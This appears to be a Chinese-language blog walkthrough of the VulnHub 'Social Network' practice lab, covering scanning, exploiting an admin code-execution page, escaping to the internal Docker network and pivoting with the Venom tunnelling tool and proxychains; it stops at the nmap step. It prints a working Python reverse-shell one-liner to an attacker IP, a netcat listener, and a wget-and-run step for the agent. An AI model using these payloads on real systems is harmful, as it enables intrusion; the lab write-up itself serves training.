前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >白帽学苑-内网渗测靶机训练(1)

白帽学苑-内网渗测靶机训练(1)

作者头像
吉师散养基地
发布2023-10-17 17:55:54
2140
发布2023-10-17 17:55:54
举报
文章被收录于专栏:我奏是太阳我奏是太阳

本文对应靶机地址:

BoredHackerBlog: Social Network ~ VulnHub


涉及知识点:

  1. 主机发现
  2. 端口扫描
  3. 服务发现
  4. 路径爬取
  5. 代码注入
  6. Shell脚本
  7. 内网信息收集
  8. 内网穿透
  9. 漏洞利用
  10. 密码破解
  11. 本地提权
  12. 攻击代码修改

将靶机导入虚拟机中,桥接模式,直接开测(本次练习涉及目标机以及攻击机,目标机为乌班图,攻击机为kali)


启动kali后对同网段主机进行扫描

62ee13ad40a349e29d2b1dbe8ebd1993.png
62ee13ad40a349e29d2b1dbe8ebd1993.png

 猜测1.9为目标机,扫描其开放端口

c1427e79e21a4f01b071a83b12316ec6.png
c1427e79e21a4f01b071a83b12316ec6.png

常见有22、443、8080、8083、3306

 发现目标确为vb上开的靶机,并开放22、5000端口,5000比较不常见,扫描一下用途

b3142bd9fc704eba867f67e349d4f308.png
b3142bd9fc704eba867f67e349d4f308.png

 得知目标为ubuntu系统,5000端口基于python服务,访问看看。

e2e8404fd27d4cebaf9fc663fc8d544d.png
e2e8404fd27d4cebaf9fc663fc8d544d.png

 简陋的一批,dirsearch扫一下看看

6b5650d112b2401a9cfc9864c6ec2e4e.png
6b5650d112b2401a9cfc9864c6ec2e4e.png

 路径中存在admin

09a01672d02d4c3c911936a0d4e804ba.png
09a01672d02d4c3c911936a0d4e804ba.png

 访问后发现是一个执行代码的页面,已知目标基于python服务,找个反弹shell的脚本,在攻击机上开启监听

4a05fd6718c74e198774533d3c75bab9.png
4a05fd6718c74e198774533d3c75bab9.png
ad2c869af29c46fd92f522ddda150428.png
ad2c869af29c46fd92f522ddda150428.png

 把里面的IP改一下

1c8bb1d4baf9400e8b91d68fb5af78a1.png
1c8bb1d4baf9400e8b91d68fb5af78a1.png

 例如我的就是:

代码语言:javascript
复制
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

有可能不弹,换shell,换命令多试几次

同时在攻击机上开启监听(我这里已经提交一次了)

代码语言:javascript
复制
nc -lvp 5555

拿到root权限

bcb02e93e6c747fa82c2b3f4734b7b04.png
bcb02e93e6c747fa82c2b3f4734b7b04.png

 但是

有点诡异,官网中阐明,这是一个中等难度的靶机。那怎么可能一个洞就能拿到。

啧,有点后背发凉。

ls看一下,发现问题了。

ea314eaf308a466ab8929c42c8d165ae.png
ea314eaf308a466ab8929c42c8d165ae.png

发现一个叫Dockerfile的文件,这文件是用来干啥的呢?

0b214bfcdaed493290778885094e6a0b.png
0b214bfcdaed493290778885094e6a0b.png
d21eb44a9f994746b1725feef20d1e05.png
d21eb44a9f994746b1725feef20d1e05.png

这说明啥。

说明透进来的不过是一个隔离容器。

咋看出来的?查看路径中的文件,如果存在.dockerenv,那么99.9%说明透进来的是一个容器。

2f7a7fad54ab477d8a02400ba63ddc40.png
2f7a7fad54ab477d8a02400ba63ddc40.png

但就算是一个隔离容器,也相当于我们拥有了一台内网的机器。

ip a查看一下内网中的主机

2aff829c9278450da666496c7ab212c6.png
2aff829c9278450da666496c7ab212c6.png

 下面进行内网的主机发现

即使用ping命令,对网段内每一个地址ping一下,观察回显

  • ping 172.17.0.1
  • ping 172.17.0.2
  • ping 172.17.0.3
  • ping 172.17.0.4
  • .........

但是由于该网段的子网掩码为16位,所以理论上存在65535个IP,由此,手动ping肯定不行。

那写个循环试试

72b68cda47c54bc3be77465f80163194.png
72b68cda47c54bc3be77465f80163194.png

 简单看前10个IP,只有1、2、3的丢包率为0,所以先对它们进行扫描

 接下来,对扫描出来的IP地址进行端口扫描。但是如果我们想用kali上的工具进行扫描多少会产生点问题。

原因在于kali无法进入内网

9cec5367eae7452baba0108affcb39c2.png
9cec5367eae7452baba0108affcb39c2.png

所以,接下来计划内网穿透,打通kali攻击机到目标路由间的隧道。

使用venom。文件给各位存完了

https://h-z.lanzoum.com/idh5p13kcxlg 密码:9bof

 为了方便后续传到被攻击机上,将linux_x64重命名成a,开启venom的监听

19cc23ef3ae3403daba47ec94ee541b1.png
19cc23ef3ae3403daba47ec94ee541b1.png

 那接下来要做啥呢,把a传到被攻击机上。

进入venom,用python3开一个80 http服务

python3 -m http.server 80

 进入被攻击机通过wget http://192.168.1.11/a下载a到被攻击机上

b73dca4fd90746b79e10ac1a3a2ebe28.png
b73dca4fd90746b79e10ac1a3a2ebe28.png

通过

chmod +x a

赋予其权限

通过

2b7095b5208d4ffca9b2142ce1f18f78.png
2b7095b5208d4ffca9b2142ce1f18f78.png

 进行连接。

kali这边也接到成功的通知了,show看看,发现有个节点,goto一下,开一个socks侦听

96766b31b4044b2aaadd3cc103e0f57f.png
96766b31b4044b2aaadd3cc103e0f57f.png

 进另一个窗口,为了让kali上的所有工具可以通过代理访问内网网段每个IP,需要使用proxychains4。

执行sudo  vi /etc/proxychains4.conf   

ea51a8820fc844a1ad1dbcd34250b0a5.png
ea51a8820fc844a1ad1dbcd34250b0a5.png

 光标划到最下方改配置

a32e657954cd48a5b86536c50015c9fd.png
a32e657954cd48a5b86536c50015c9fd.png

改完之后kali上的工具就可以访问到内网的IP了,用nmap扫一下

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-09-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 本文对应靶机地址:
  • 涉及知识点:
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档